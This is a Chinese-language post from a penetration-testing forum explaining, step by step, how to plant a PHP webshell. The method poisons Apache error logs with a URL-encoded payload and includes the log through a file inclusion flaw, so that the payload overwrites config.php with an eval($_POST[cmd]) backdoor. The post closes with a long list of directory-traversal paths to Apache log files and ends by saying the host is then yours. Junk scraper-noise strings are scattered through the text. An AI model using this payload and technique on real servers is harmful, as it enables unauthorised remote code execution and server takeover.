中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]

作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 " w$ F& M! g. p' r* G

" g# _8 c) _- E6 i2 P比如还是这句一句话木马 1 ?" {* m) ~/ x. b7 h
<?eval($_POST[cmd]);?>   
1 p! p  C5 ~% X7 w" I& g/ \
/ }- u- i8 e$ @6 Z到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
/ q% S# e+ N" s, W6 R% |fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 ! f; k2 D, l+ p' X% R

# c  z9 a+ }: G, t1 z<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); # j1 B0 [$ R4 J  s0 d1 v
fclose($fp);?>   //在config.php里写入一句木马语句
7 s4 m5 u7 M/ I; j5 w; ?# A
; }" n3 a$ V6 S- X我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。   p& C# g. m3 w* l
转换为
+ g7 _! M4 R2 t1 _0 z* Z%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F 6 f1 ^5 X; X! K- p1 X1 m
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
" _" x5 E1 {4 G" b9 x5 K%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B 4 a- j" L  v5 ]6 O. ^
fclose%28%24fp%29%3B%3F%3E
9 O. {: F3 v: y+ P$ b+ N我们提交 + }, J3 [5 {8 T% N, w/ O+ ]- k5 a
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww ) i. q6 `( [" o5 S
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp + r1 D5 m/ N" _% L9 G2 O( v3 R
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
& B2 D# J" P7 q, I! b2 z8 vcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
  h% I* G  d! l/ O: Z8 y
+ z' Z2 x5 K2 _( X6 s这样就错误日志里就记录下了这行写入webshell的代码。
/ O  j. {# @- d1 s) \5 z! i$ X我们再来包含日志,提交
3 z3 v8 M# `8 q8 ]( Jhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log " z6 w' E6 v3 g2 _& o1 o% N" c
& U) g- W' w; |' P8 q  r
这样webshell就写入成功了,config.php里就写入一句木马语句 * @+ g: O. u+ `; ~2 J9 V- _9 f
OK. * G" s; Q3 Q7 ^
http://www.xxx.com/forum/config.php这个就成了我们的webshell
/ X: e; M( U* |( X- J2 A直接用lanker的客户端一连,主机就是你的了。
. u0 A0 v! |" {: I% j4 \6 m: v+ t+ ?1 ?3 q1 o7 L
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 ! S8 |5 l$ x, ^, c  P4 P: u3 c! J
: u9 K( g2 {+ C' B5 w' m& h! O' R
其他的日志路径,你可以去猜,也可以参照这里。
; }0 s2 D8 ]# M% t1 R9 T% W" `../../../../../../../../../../var/log/httpd/access_log 4 y! m$ ^& n( R$ V+ O' [, O9 A) L
../../../../../../../../../../var/log/httpd/error_log   f% w! `. V8 w- t3 ~; Y, U
../apache/logs/error.log ! g1 R# N; Z$ L4 {1 ~+ e+ m
../apache/logs/access.log
8 Y5 W8 N- g2 i../../apache/logs/error.log ! i" K  B0 c) J) C9 J" H/ x) s
../../apache/logs/access.log
. t0 v# A  h3 W, L( q9 t% H../../../apache/logs/error.log 7 o8 V0 q$ K% g; Z( Q) W
../../../apache/logs/access.log + v" |6 i8 x0 J. [3 S
../../../../../../../../../../etc/httpd/logs/acces_log
+ ~2 C4 v4 @: i  u1 _0 W$ P../../../../../../../../../../etc/httpd/logs/acces.log
* B+ e- i1 U4 }7 e../../../../../../../../../../etc/httpd/logs/error_log
$ G% }3 g% _) B2 I../../../../../../../../../../etc/httpd/logs/error.log
) }: L  I# ~8 j+ v8 S../../../../../../../../../../var/www/logs/access_log
8 {6 [7 K. @1 B, h4 s+ m! J../../../../../../../../../../var/www/logs/access.log
4 g5 ]) y; T% i0 {../../../../../../../../../../usr/local/apache/logs/access_log 7 I" W/ z! v  E) b/ V
../../../../../../../../../../usr/local/apache/logs/access.log 8 M: i2 B5 y& u. H8 O
../../../../../../../../../../var/log/apache/access_log ( m8 Q/ p% \1 G/ v* Z
../../../../../../../../../../var/log/apache/access.log
" F& k: G! y6 ]' l4 S8 m../../../../../../../../../../var/log/access_log , N8 [  I) {6 @1 X: y. o
../../../../../../../../../../var/www/logs/error_log ) e0 N# g6 \& J7 }1 O2 i
../../../../../../../../../../var/www/logs/error.log
6 v5 A. ]  p2 ]4 t9 i5 b: w* w  q../../../../../../../../../../usr/local/apache/logs/error_log
/ G% o5 S2 A# a4 ~, c$ D../../../../../../../../../../usr/local/apache/logs/error.log
: }: _; ^9 n& S2 f+ g: r. V% p% P../../../../../../../../../../var/log/apache/error_log
* s( O% n! F, q1 h../../../../../../../../../../var/log/apache/error.log 8 v/ K. \: ]2 n; m$ a0 {
../../../../../../../../../../var/log/access_log ! k* p" a, e6 X/ _( k, g
../../../../../../../../../../var/log/error_log ( Y3 v* N5 v& O" u; J6 ]
/var/log/httpd/access_log      
  @, ?$ T2 I2 z# M. S, r6 |8 l/var/log/httpd/error_log     
6 B" ]9 ]" n; }" m, T  V../apache/logs/error.log     
0 @# \7 X' |9 p9 \5 l../apache/logs/access.log 6 w; x8 \: M* V' A
../../apache/logs/error.log
/ X1 O  D# r# }' h../../apache/logs/access.log
1 F- M& E  L. w. I  ^../../../apache/logs/error.log
: P3 U9 Z" d3 R- }7 g2 |2 w../../../apache/logs/access.log 8 ~; d: `0 P# H5 I5 n0 _5 F
/etc/httpd/logs/acces_log ( Z3 R6 ^5 a5 E9 |$ I
/etc/httpd/logs/acces.log . l) R9 W# t: X, f* x) o
/etc/httpd/logs/error_log
( Y* F& }0 q) f# n/etc/httpd/logs/error.log
" Y9 u1 W* m. `5 q$ c- y/var/www/logs/access_log
# t8 K' }" n2 Q3 n7 y' h' x" d: I0 l/var/www/logs/access.log
$ |' }: ?5 C  C9 ]& w. r" c6 O8 _8 I/usr/local/apache/logs/access_log : x2 p7 T0 u4 M; B8 @
/usr/local/apache/logs/access.log
* Y2 f+ j, f9 l$ c6 ?! b; U, _/var/log/apache/access_log
4 x- Y/ f4 t) r; o; l/var/log/apache/access.log
: ^* D9 t2 S4 P2 s. J  V/var/log/access_log : r  p9 v4 q7 n& c# `: l
/var/www/logs/error_log ! w: t( y8 U. x- v0 D2 E
/var/www/logs/error.log
* g; w& _8 E; p+ t$ c/usr/local/apache/logs/error_log
( p" a9 Z) w7 @$ W( E/ o/usr/local/apache/logs/error.log
; ^- R/ @6 A& ~  v# Q  A# O$ V/var/log/apache/error_log ! f7 J% u  X' E& m  X3 y8 ?
/var/log/apache/error.log
- d$ ~4 p) y& J) \% V/var/log/access_log
" m! g* A, _% I; H6 w/var/log/error_log




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2